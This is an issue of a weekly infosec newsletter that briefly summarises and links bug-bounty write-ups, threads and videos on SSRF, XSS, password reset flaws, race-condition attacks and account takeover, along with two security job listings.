👩‍💻IW Weekly #122: SSRF, Password Reset Vulnerability, XSS in Hotjar, Single-Packet Attack, WhatsApp Desktop Code Execution, Business Logic Errors and many more…

Welcome to the #IWWeekly122 - the Monday newsletter that brings the best in Infosec straight to your inbox.

To help you out, we have 5 Articles, 4 Threads, 3 Videos, 2 Job Alerts and a Special Item 🫢

Read, upskill yourself and spread love to the community 💝

Excited? Let’s jump in 👇

📝 5 Infosec Articles

1. Gain insights into how @saugatpk5 was able to steal Facebook auth token and got multiple bounties from Meta bug bounty program. 
2. The team at @SaltSecurity highlights XSS vulnerability in Hotjar that proned a million websites to information disclosure risk.
3. @Jerry1319 discusses how he chained Business Logic error to gain Pre-Account Takeover on a Google VRP target. 
4. @googlechrome asks users to switch to other Ad blocker as they soon plan to disable uBlock Origin.
5. The team at @flatt_sec_en explores the single-packet attack, a new technique that leverages race conditions while evading the effects of network jitter.

🧵4 Trending Tweets

1. Read how to stay motivated while bug bounty hunting in this excellent thread by @ctbbpodcast featuring @SinSinology
2. @harshbothra_ talks about their new initiative “Rakshak”. Kudos!
3. Checkout this wonderful thread by @intigriti to find your first SSRF vulnerability or to escalate your current SSRF to something huge.
4. @mcipekci shares a fantastic tale on how they were able to reset any user's password in a recent pentest engagement. 

📽️ 3 Insightful Videos

1. @NahamSec ran nuclei on all of their bug bounty programs and made a cool video on it. Do check it out.
2. Join @ctbbpodcast in Episode 81 with @MtnBer as they dive into client-side hacking and DevTools tips for bug bounty hunters!
3. @_johnhammond shows how it is possible to run arbitrary python code on Whatsapp desktop application and the security issues that come with it.

💼 2 Job Alerts

1. Join Redfox Security as a Red Teamer to unleash your creativity and technical skills in pioneering cyber security solutions. 
2. Michelin is hiring a Security Analyst for Pune location to enhance the security of their diverse mobility solutions and services.

🎁 1 Special Item

1. This week’s highlight: @Bugcrowd’s new tool, HUNT, offers a fantastic open-source contribution opportunity, featuring a collection of extensions for @Burp_Suite and @zaproxy.

That’s all for this week. Hope you enjoyed these incredible finds and learned something new from today’s newsletter. Meet you again next week hacker, until then keep pushing 💪

This newsletter would not have been made possible without our amazing ambassadors.

Resource contribution by: Nikhil A Memane, Hardik Singh, Bhavesh Harmalkar, Manan, Shlok, Rachit Arora, Siddhesh Prakash Patil

Newsletter formatting by: Bhavesh Harmalkar, Nithin R, Manan, Shlok, Vivek Reddy, Siddhesh Prakash Patil

Lots of love
Editorial team,
Infosec Writeups